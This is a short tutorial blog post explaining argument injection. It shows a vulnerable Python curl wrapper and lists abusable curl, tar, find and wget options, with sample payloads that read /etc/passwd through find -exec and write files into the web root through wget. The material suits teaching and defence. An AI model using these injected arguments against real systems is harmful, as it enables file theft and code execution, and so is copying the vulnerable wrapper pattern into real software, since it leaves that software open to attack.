Argument Injection – Vulnerabilities

Posted by

Argument injection is a type of attack based on tampering with the input parameters of a page. This can enable attackers to see data which they normally cannot see or modify data which they normally cannot modify, via the user interface.

Argument injection is similar to command injection as tainted data is passed to a command executed in a shell without proper sanitization/escaping.

It can happen in different situations, where you can only inject arguments to a command:

  • Improper sanitization (regex)
  • Injection of arguments into a fixed command (PHP:escapeshellcmd, Python: Popen)
  • Bash expansion (ex: *)

In the following example, a python script takes the inputs from the command line to generate a curl command:

from shlex import quote,split
import sys
import subprocess

if __name__=="__main__":
    command = ['curl']
    command = command + split(sys.argv[1])
    print(command)
    r = subprocess.Popen(command)

It is possible for an attacker to pass several words to abuse options from curl command

python python_rce.py "https://www.google.fr -o test.py" 

We can see by printing the command that all the parameters are split allowing us to inject of an argument that will save the response in an arbitrary file.

['curl', 'https://www.google.fr', '-o', 'test.py']

List of exposed commands

CURL

It is possible to abuse curl through the following options:

 -o, --output <file>        Write to file instead of stdout
 -O, --remote-name          Write output to a file named as the remote file

In case there is already one option in the command it is possible to inject several URLs to download and several output options. Each option will affect each URL in sequence.

TAR

For the tar command it is possible to inject arbitrary arguments in different commands.

Argument injection can happen into the ”’extract”’ command:

--to-command <command>
--checkpoint=1 --checkpoint-action=exec=<command>
-T <file> or --files-from <file>

Or in the ”’create”’ command:

-I=<program> or -I <program>
--use-compres-program=<program>

There are also short options to work without spaces:

-T<file>
-I"/path/to/exec"

FIND

Find some_file inside /tmp directory.

$file = "some_file";
system("find /tmp -iname ".escapeshellcmd($file));

Print /etc/passwd content.

$file = "sth -or -exec cat /etc/passwd ; -quit";
system("find /tmp -iname ".escapeshellcmd($file));

WGET

Example of vulnerable code

system(escapeshellcmd('wget '.$url));

Arbitrary file write

$url = '--directory-prefix=/var/www/html http://example.com/example.php';

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.